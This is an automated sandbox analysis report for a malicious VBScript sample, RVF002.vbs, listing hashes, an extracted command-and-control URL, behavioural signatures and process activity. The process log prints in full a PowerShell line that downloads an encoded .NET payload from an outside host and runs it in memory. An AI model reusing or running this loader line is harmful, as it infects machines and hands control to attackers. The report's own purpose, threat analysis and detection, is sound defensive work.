Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
24-12-2024 09:44
Static task
static1
Behavioral task
behavioral1
Sample
RVF001.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
RVF001.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
RVF002.vbs
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
RVF002.vbs
Resource
win10v2004-20241007-en
General
-
Target
RVF002.vbs
-
Size
236KB
-
MD5
7b474b087d336f766ba4cd74067e2786
-
SHA1
aac3de5ebd60465dabdd78033637819b68d1e91b
-
SHA256
92d4a215bc6adc95dec27c087a23e307dcebd79b2abcbb76f9f9dc08a70b3e5a
-
SHA512
e431562d6a08d91075c8498dd88de3c83a7e21bf627263254f3b62e9f9b5493a34f1f942412865e3bd4bc3bcfc4ff2c8f5223aa0fa58601803d1f43451f50dfe
-
SSDEEP
24:QnODOUWlHllyjOMyE2aL8gVEuMvywFfV7N9Riwnwm43YQ7FYiVLneMDTFv9vPvWE:yKVWtl6OeqyYLQeMHNOSAgHyLKhB
Malware Config
Extracted
https://schoolcrypter.com/dll_startup
Signatures
-
pid Process 2340 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2340 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2340 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1736 wrote to memory of 2340 1736 WScript.exe 30 PID 1736 wrote to memory of 2340 1736 WScript.exe 30 PID 1736 wrote to memory of 2340 1736 WScript.exe 30
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RVF002.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('https://schoolcrypter.com/dll_startup'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('ad6c8d496523-a4ab-b6a4-dbc7-750db9b1=nekot&aidem=tla?txt.qT/o/moc.topsppa.0a726-dspok/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2340
-